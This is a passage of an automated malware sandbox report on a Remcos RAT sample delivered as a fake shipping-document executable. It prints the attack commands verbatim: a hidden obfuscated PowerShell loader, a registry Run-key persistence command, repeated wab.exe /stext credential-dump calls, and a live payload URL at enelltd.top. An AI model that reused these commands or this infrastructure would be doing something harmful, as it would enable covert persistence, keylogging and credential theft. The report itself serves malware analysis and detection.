              Source: powershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
              Source: powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
              Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enelltd.top/
              Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2890039367.0000000020E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bin
              Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.bino
              Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://enelltd.top/XpMumnKrmZynRk242.binx6
              Source: powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownHTTPS traffic detected: 172.67.215.46:443 -> 192.168.2.4:49738 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

              System Summary

              barindex
              Powershell drops PE file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exeJump to dropped file
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00406DA00_2_00406DA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0491F0001_2_0491F000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0491F8D01_2_0491F8D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0491ECB81_2_0491ECB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0491EFF41_2_0491EFF4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0491B7131_2_0491B713
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0745BB581_2_0745BB58
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeStatic PE information: invalid certificate
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameacrodontism.exeV vs 586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeBinary or memory string: OriginalFilenameacrodontism.exeV vs 586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drBinary or memory string: OriginalFilenameacrodontism.exeV vs 586 R1 M-LINE - GEORGIA 03.05.2024.exe
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@71/43@3/3
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeFile created: C:\Users\user\AppData\Roaming\brosyJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6672
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5164
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jmofvnb-6GMGJI
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2352
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6732
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5852
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5632
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4128
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsi6C90.tmpJump to behavior
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exeVirustotal: Detection: 13%
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeFile read: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyxcqtdymwkuzcbcqpf"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 12
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 12
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"Jump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeSection loaded: wintypes.dllJump to behavior
